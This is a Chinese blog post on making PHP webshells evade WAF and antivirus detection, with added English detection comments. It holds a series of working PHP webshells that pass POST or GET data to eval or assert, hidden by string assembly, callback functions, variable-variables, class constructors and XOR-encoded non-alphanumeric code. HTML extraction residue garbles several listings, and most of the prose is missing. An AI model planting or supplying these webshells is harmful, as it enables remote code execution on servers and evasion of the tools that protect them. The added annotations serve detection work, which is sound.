
【实战技巧】webshell多种方法免杀

时间:2021-01-08   访问量:1329

webshell西webgetshell


01


 

WAFwebshell

wafwaf


D

D_IIS, , !


02


PHP

php

php

1<?php /* Detection note: POST field 'a' flows unmodified into eval(), so the request body runs as PHP; '@' only hides the notice for a missing field. eval is a language construct, so disable_functions cannot block it - alert on any eval() whose argument derives from request data. */ eval(@$_POST['a']); ?>


 eval () 

$_POST[a] a

evalPHP

便

assert

1<?php /* Detection note: same request-to-sink flow with assert() as the sink. String arguments to assert() are evaluated as code only before PHP 8.0 (deprecated in 7.2); on older runtimes zend.assertions=-1 stops assert() from evaluating its argument. */ assert(@$_POST['a']); ?>


php5php7


php5assert$f='assert';$f(...);

php7asserteval

PHPevalPHPassertPHP


eval()   

assert() 便

1<?php
// Detection note: GET parameter 'func' is interpolated into the string handed to
// assert(), so the caller names the function that runs. Any assert() whose string
// argument contains request data is a code-execution sink on PHP before 8.0.
// NOTE(review): the <span ...> fragments below are page-extraction residue, not PHP.
2$func = $_GET[<span data-raw-text="" "="" data-textnode-index="49" data-index="870" class="character" style="margin: 0px; padding: 0px;">"func<span data-raw-text="" "="" data-textnode-index="49" data-index="875" class="character" style="margin: 0px; padding: 0px;">"];
3assert(<span data-raw-text="" "="" data-textnode-index="53" data-index="886" class="character" style="margin: 0px; padding: 0px;">"$func()<span data-raw-text="" "="" data-textnode-index="53" data-index="894" class="character" style="margin: 0px; padding: 0px;">");
4?>
5# >


03


 assert


assertassertfalseWarning使asserteval


便php



04


1<?php
// Detection note: substr_replace(), chr() and preg_replace() assemble the string
// "assert" at run time ("xxasser" + chr(116), then the "xx" prefix is stripped), so
// the sink name never appears as a literal. Line 8 is the sink: a variable-function
// call on POST field 'x'. Match on `$var(<request data>)` rather than on the name.
// NOTE(review): the <span ...> fragments below are page-extraction residue, not PHP.
2$a = substr_replace(<span data-raw-text="" "="" data-textnode-index="78" data-index="1193" class="character" style="margin: 0px; padding: 0px;">"xxser<span data-raw-text="" "="" data-textnode-index="78" data-index="1199" class="character" style="margin: 0px; padding: 0px;">"
,<span data-raw-text="" "="" data-textnode-index="80" data-index="1201" class="character" style="margin: 0px; padding: 0px;">"asser<span data-raw-text="" "="" data-textnode-index="80" data-index="1207" class="character" style="margin: 0px; padding: 0px;">",-3);
3$aa = array('',$a);
4$b = $aa[1].chr('116');
5$fun=preg_replace(<span data-raw-text="" "="" data-textnode-index="98" data-index="1276" class="character" style="margin: 0px; padding: 0px;">"/xx/<span data-raw-text="" "="" data-textnode-index="98" data-index="1281" class="character" style="margin: 0px; padding: 0px;">",<span data-raw-text="" "="" data-textnode-index="100" data-index="1283" class="character" style="margin: 0px; padding: 0px;">"<span data-raw-text="" "="" data-textnode-index="100" data-index="1284" class="character" style="margin: 0px; padding: 0px;">",$b);
6$cc = substr_replace(<span data-raw-text="" "="" data-textnode-index="104" data-index="1312" class="character" style="margin: 0px; padding: 0px;">"<span data-raw-text="" "="" data-textnode-index="104" data-index="1313" class="character" style="margin: 0px; padding: 0px;">",$fun,0);
7
8$cc($_POST['x']);
9?>





05





1

,

 1<?php 
// Detection note: the sink (eval) and the source ($_POST['x']) are each wrapped in
// a one-line function and connected only through string-named calls, so no single
// line shows request data reaching eval(). Resolve calls through the wrappers.
2
// zeo() returns its argument unchanged; it exists only to add indirection.
3function zeo($b){
4    return $b;
5}
// ass() is the sink: it evaluates its argument as PHP code.
6function ass($a){
7    return eval($a);
8}
// post() is the source: it returns the request-controlled POST field 'x'.
9function post(){
10    return $_POST['x'];
11}    
12
// The bare words ass and post are undefined constants; PHP before 8.0 converts
// them to the strings 'ass' and 'post' (with a warning), which are then called
// as function names. run() is defined but never called in this listing.
13function run(){
14    return zeo(ass)(zeo(post)());
15}
16
// The call that actually executes: equivalent to ass(post()).
17zeo(ass)(zeo(post)());
18
19?>



2+

,

 // Detection note: every function listed accepts a caller-supplied callback, so each
 // is an indirect call site that rules should cover alongside direct eval()/assert().
 // Entry 15 shows the pattern: assert named as the callback, POST field x as argument.
 // NOTE(review): entry 13 reads "registregister_..."; presumably
 // register_shutdown_function() is meant. array_walk() is listed twice (4 and 7).
 1call_user_func_array()
2call_user_func()
3array_filter() 
4array_walk()  
5array_map()
6array_reduce()
7array_walk() 
8array_walk_recursive()
9filter_var() 
10filter_var_array() 
11uasort() 
12uksort() 
13registregister_shutdown_function()
14register_tick_function()
15forward_static_call_array(assert,array($_POST[x]));


 1<?php 
// Detection note: pj() returns the concatenation "register_shut" . "down_function",
// and zeo() calls that name with ($c, $d). Line 10 therefore registers assert as a
// shutdown callback with POST field 'x' as its argument, so the sink fires when the
// script ends rather than at a visible call site. The bare word `assert` is an
// undefined constant, which PHP before 8.0 converts to the string 'assert'.
// NOTE(review): the <span ...> fragments below are page-extraction residue, not PHP.
2function zeo($c,$d){
3    pj()($c,$d);
4}
5function pj(){
6    return <span data-raw-text="" "="" data-textnode-index="249" data-index="2133" class="character" style="margin: 0px; padding: 0px;">"register_shut<span data-raw-text="" "="" data-textnode-index="249" data-index="2147" class="character" style="margin: 0px; padding: 0px;">"
.<span data-raw-text="" "="" data-textnode-index="251" data-index="2149" class="character" style="margin: 0px; padding: 0px;">"down_function<span data-raw-text="" "="" data-textnode-index="251" data-index="2163" class="character" style="margin: 0px; padding: 0px;">";
7}
8
9$b=$_POST['x'];
10zeo(assert,$b);
11?>



3

4

1<?php
// Detection note: substr_replace("assexx", "rt", 4) yields "assert"; the call
// $b($_POST['x']) is buried inside nested array()/assignment expressions on line 3.
// The nesting adds no behaviour - the variable-function call on request data is
// the only operation that matters for detection.
// NOTE(review): the <span ...> fragments below are page-extraction residue, not PHP.
2$b = substr_replace(<span data-raw-text="" "="" data-textnode-index="272" data-index="2288" class="character" style="margin: 0px; padding: 0px;">"assexx<span data-raw-text="" "="" data-textnode-index="272" data-index="2295" class="character" style="margin: 0px; padding: 0px;">"
,<span data-raw-text="" "="" data-textnode-index="274" data-index="2297" class="character" style="margin: 0px; padding: 0px;">"rt<span data-raw-text="" "="" data-textnode-index="274" data-index="2300" class="character" style="margin: 0px; padding: 0px;">",4);
3$a = array($arrayName = ($arrayName =($arrayName = array('a' => $b($_POST['x'])))));
4?>



5

PHP使

// Variable-variable demo: $$a assigns to the variable whose name is the value of
// $a, so line 2 writes $hello and line 3 prints "world".
1$a = 'hello';
2$$a = 'world';
3echo $hello;
4# world


ahello

使ahelloaworld

world

1<?php 
// Detection note: $$zeo writes POST field 'x' into $dalao (the value of $zeo), so
// eval() on line 4 receives request data although $_POST never appears in its
// argument. Taint tracking has to resolve the variable-variable to see the flow.
2$zeo='dalao';
3$$zeo=$_POST['x'];
4eval($dalao);
5?>


image-20200407220547482

eval


06


 


fuzz

null

1<?php 
// Detection note: $$zeo writes POST field 'x' into $dalao, which reaches eval() on
// line 4 behind an empty backtick pair. Backticks are PHP's shell-execution
// operator; presumably the empty pair evaluates to null/empty and leaves the
// argument unchanged - TODO confirm on the PHP version in use.
// Normalise such no-op prefixes before matching eval(<tainted value>).
2$zeo='dalao';
3$$zeo=$_POST['x'];
4eval(``.$dalao);
5?>


07


 使


D

 1<?php 
// Detection note: zeo2::post() returns POST field 'x'; zeo::__construct() passes
// that value to assert(), so `new zeo` on line 18 is what triggers the sink.
// $code inside the constructor is a local variable, not the $code property, and
// $b / $bzzz are never read in this listing - the class structure only hides the
// data flow. Follow request data through parent:: calls and constructors.
2class zeo2
3
{
4  public $b ='';
5
6  function post(){
7    return $_POST['x'];
8  }
9}
10class zeo extends zeo2
11
{
12  public $code=null;
13  function __construct(){
14          $code=parent::post();
15    assert($code);
16  }
17}
18$blll = new zeo;
19$bzzz = new zeo2;
20?>



08



a-z

PHP

assert

P

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html


1<?php
// Detection note: identifiers are built by XOR-ing pairs of punctuation characters,
// so the statements contain no alphabetic function or superglobal names. The pairs
// on line 3 evaluate to "_GET" and those on line 4 to "_POST"; `@$_++` leaves $_
// equal to 1, and !$_ is false (array key 0). Line 7 is therefore
// $_GET[0]($_POST[1]): function name from the query string, argument from the body.
// Keyword signatures have nothing to match here; useful signals are calls through
// ${...}[...](...) and an unusually high share of non-alphanumeric characters.
// NOTE(review): the <span ...> fragments below are page-extraction residue, not PHP.
2@$_++;
3$__ = (<span data-raw-text="" "="" data-textnode-index="455" data-index="3525" class="character" style="margin: 0px; padding: 0px;">"`<span data-raw-text="" "="" data-textnode-index="455" data-index="3527" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="457" data-index="3531" class="character" style="margin: 0px; padding: 0px;">"?<span data-raw-text="" "="" data-textnode-index="457" data-index="3533" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="459" data-index="3539" class="character" style="margin: 0px; padding: 0px;">":<span data-raw-text="" "="" data-textnode-index="459" data-index="3541" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="461" data-index="3545" class="character" style="margin: 0px; padding: 0px;">"}<span data-raw-text="" "="" data-textnode-index="461" data-index="3547" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="463" data-index="3553" class="character" style="margin: 0px; padding: 0px;">"%<span data-raw-text="" "="" data-textnode-index="463" data-index="3555" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="465" data-index="3559" class="character" style="margin: 0px; padding: 0px;">"`<span data-raw-text="" "="" data-textnode-index="465" data-index="3561" class="character" style="margin: 0px; padding: 0px;">") . 
(<span data-raw-text="" "="" data-textnode-index="467" data-index="3567" class="character" style="margin: 0px; padding: 0px;">"{<span data-raw-text="" "="" data-textnode-index="467" data-index="3569" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="469" data-index="3573" class="character" style="margin: 0px; padding: 0px;">"/<span data-raw-text="" "="" data-textnode-index="469" data-index="3575" class="character" style="margin: 0px; padding: 0px;">");
4$___ = (<span data-raw-text="" "="" data-textnode-index="473" data-index="3587" class="character" style="margin: 0px; padding: 0px;">"$<span data-raw-text="" "="" data-textnode-index="473" data-index="3589" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="475" data-index="3593" class="character" style="margin: 0px; padding: 0px;">"{<span data-raw-text="" "="" data-textnode-index="475" data-index="3595" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="477" data-index="3601" class="character" style="margin: 0px; padding: 0px;">"~<span data-raw-text="" "="" data-textnode-index="477" data-index="3603" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="479" data-index="3607" class="character" style="margin: 0px; padding: 0px;">".<span data-raw-text="" "="" data-textnode-index="479" data-index="3609" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="481" data-index="3615" class="character" style="margin: 0px; padding: 0px;">"/<span data-raw-text="" "="" data-textnode-index="481" data-index="3617" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="483" data-index="3621" class="character" style="margin: 0px; padding: 0px;">"`<span data-raw-text="" "="" data-textnode-index="483" data-index="3623" class="character" style="margin: 0px; padding: 0px;">") . 
(<span data-raw-text="" "="" data-textnode-index="485" data-index="3629" class="character" style="margin: 0px; padding: 0px;">"-<span data-raw-text="" "="" data-textnode-index="485" data-index="3631" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="487" data-index="3635" class="character" style="margin: 0px; padding: 0px;">"~<span data-raw-text="" "="" data-textnode-index="487" data-index="3637" class="character" style="margin: 0px; padding: 0px;">") . (<span data-raw-text="" "="" data-textnode-index="489" data-index="3643" class="character" style="margin: 0px; padding: 0px;">"(<span data-raw-text="" "="" data-textnode-index="489" data-index="3645" class="character" style="margin: 0px; padding: 0px;">" ^ <span data-raw-text="" "="" data-textnode-index="491" data-index="3649" class="character" style="margin: 0px; padding: 0px;">"|<span data-raw-text="" "="" data-textnode-index="491" data-index="3651" class="character" style="margin: 0px; padding: 0px;">");
5('%05'^'`')
6#  ^,PHP,,,
7${$__}[!$_](${$___}[$_]);
8?>


便

PHPPHP


god_zZz's Blog

https://blog.csdn.net/god_zzZ/article/details/112007388


